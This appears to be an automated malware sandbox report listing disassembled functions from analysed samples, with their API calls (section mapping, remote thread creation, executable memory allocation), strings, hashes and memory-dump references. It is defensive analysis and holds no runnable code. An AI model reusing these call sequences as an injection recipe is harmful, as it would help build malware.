Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64

Function 0040157C Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64

Function 00402FE9 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040311D
NtTerminateProcess.NTDLL ref: 00403136

Memory Dump Source

Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5

Function 022A209C Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 022A20C4
Module32First.KERNEL32(00000000,00000224), ref: 022A20E4

Memory Dump Source

Source File: 00000000.00000002.2183129368.000000000229B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0229B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_229b000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: b5cbda057fd971715a864b16c0820bf5680e56a18c2476aa2b783e6eddf62f7f
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 6AF09632110711EFD7303BF5989DB6E76EDEF59724F100629EA46918C4DB70E8458A61

Function 021D003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 021D024D

Strings

cess, xrefs: 021D018D
kernel32.dll, xrefs: 021D008F, 021D0095

Memory Dump Source

Source File: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21d0000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 671f0ada710d20adefc1c2dcdc996983a2ec8ffecd7f62bbe8e0ccc1b23024bb
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: B2526A75A41229DFDB64CF68C984BACBBB1BF09304F1580D9E94DAB351DB30AA85CF14

Function 021D0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,021D0223,?,?), ref: 021D0E19
SetErrorMode.KERNELBASE(00000000,?,?,021D0223,?,?), ref: 021D0E1E

Memory Dump Source

Source File: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 3cf7066f3c277190ebbdbd16f9613bb646a05e9011dfd1008548e03a8f07cb7b
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 7AD01231145128BBD7002AA4DC09BCD7B1CDF09B66F108011FB0DD9080C770954046E5

Function 00401918 Relevance: 1.3, APIs: 1, Instructions: 57
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F

Function 00401924 Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
Instruction ID: 34fc3aff5e218d4630d956a4f9c4c41b7245144a44faa4fd8074b33eba8f9d72
Opcode Fuzzy Hash: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
Instruction Fuzzy Hash: 43017CF5208145E7EB015A948DB0EBA26299B45314F300237B617BA1F4C57D8602E76F

Function 022A1D5B Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 022A1DAC

Memory Dump Source

Source File: 00000000.00000002.2183129368.000000000229B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0229B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_229b000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 7e95e9238b0fdc3b12b9210f67e97209dcb018109f41795a4d6e975f830f82ec
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 25113C79A00208EFDB01DF98C985E98BBF5AF08351F058094F948AB361D371EA50DF80

Function 00401941 Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
Instruction ID: 53d82b158b021bc4b6cde56962adc0b8c8d23177238c0d6ee964112a53f005ae
Opcode Fuzzy Hash: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
Instruction Fuzzy Hash: 38F0AFB6308249F7DB01AA908DB1EBA36299B54315F300633B617B91F5C57C8A12E76F

Function 00401954 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
Instruction ID: f7568a5a22988f4b084f7ac8228f9b89e575eda69d31bfffabc36cd9cbe45c64
Opcode Fuzzy Hash: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
Instruction Fuzzy Hash: BDF0C2B6208144F7DB019AA18DB1FBA36299B44314F300233BA17B90F5C67C8612E76F

Function 0040194C Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
Instruction ID: 9d6088553fbd849a34ffa1589a5f9bffd683413c7e042594889390f4c4f3f426
Opcode Fuzzy Hash: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
Instruction Fuzzy Hash: 08F0C2B2208144F7DB019A958DA0FBA36299B44314F300633B617B91F5C57C8A02E72F

Non-executed Functions

Function 021D092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 021D0966
., xrefs: 021D095F
GetProcAddress., xrefs: 021D09DC, 021D09DF, 021D09E4

Memory Dump Source

Source File: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 8fa6ff5e40234b0d48af797a21d580cf176a2f4d8853edfa434f4442e387748a
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 9A316AB6900609DFDB14CF99C880AAEBBF9FF48324F15404AD845A7310D7B1EA45CFA4

Function 022A1979 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2183129368.000000000229B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0229B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_229b000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: bbe28a4394ab586a2143c4d92e92163aa5b15a9eaed650f292dae0d83f6b91f8
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 3B11C272350201AFD724CF95DC91EA673EAFB88330B198055ED08CB709D675E812CB60

Function 021D0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 8507db8a57e9bd242883e45178e9b010c50f3eb4a8ed2fc0f41f792afb711dc6
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 1401A276A50A14CFDF21CF24C814BAA33F5EB8A316F5944A9D90A97282E774A9418B90

Analysis Process: wjshsfaPID: 4500, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	28
Total number of Limit Nodes:	2

Executed Functions

Function 0224003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0224024D

Strings

cess, xrefs: 0224018D
kernel32.dll, xrefs: 0224008F, 02240095

Memory Dump Source

Source File: 00000004.00000002.2417110423.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2240000_wjshsfa.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 4af49dc1097356e632b0ba7ba54f92b73fc02ddab49efb284a84d0357cf7f545
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: D5527B74A11229DFDB68CF98C984BACBBB1BF09304F1480D9E54DAB355DB30AA85DF14

Function 021521CC Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021521F4
Module32First.KERNEL32(00000000,00000224), ref: 02152214

Memory Dump Source

Source File: 00000004.00000002.2417051568.000000000214B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0214B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_214b000_wjshsfa.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: fbe398ad1bd53db3bd5e16f9589385b3bf963c7b435441af9f52e5162c108e77
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 5EF06237140721AFD7202BB5AC8CB6B76E9AF49625F1006A8EE66910C0DB74E8454A61

Function 02240E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02240223,?,?), ref: 02240E19
SetErrorMode.KERNELBASE(00000000,?,?,02240223,?,?), ref: 02240E1E

Memory Dump Source

Source File: 00000004.00000002.2417110423.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2240000_wjshsfa.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 6101b777299bb5550370ac940f085d6906adc7034c19501afa3e0b0c422ab8e2
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 98D0123125512877D7002AD4DC09BCD7B1CDF09B66F008011FB0DDD080CB70964046E5

Function 02151E8B Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02151EDC

Memory Dump Source

Source File: 00000004.00000002.2417051568.000000000214B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0214B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_214b000_wjshsfa.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: a26e17f49fcd8c1a19eb938f9f3b6cf2f3039042dce4e328d03a9852c248d9e1
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: D6113C79A40208FFDB01DF98C985E99BBF5AF08351F058095F9589B361D371EA50DF90

Analysis Process: 9CFE.exePID: 5812, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	12.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.6%
Total number of Nodes:	1523
Total number of Limit Nodes:	37

Executed Functions

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
OleUninitialize.OLE32(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

_?=, xrefs: 00403A64
SeShutdownPrivilege, xrefs: 00403C16
/D=, xrefs: 004039A6
1C, xrefs: 00403B56
NSIS Error, xrefs: 004038E2
Error launching installer, xrefs: 00403A7D
NCRC, xrefs: 0040397C
\Temp, xrefs: 00403A1B
~nsu.tmp, xrefs: 00403AF7

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
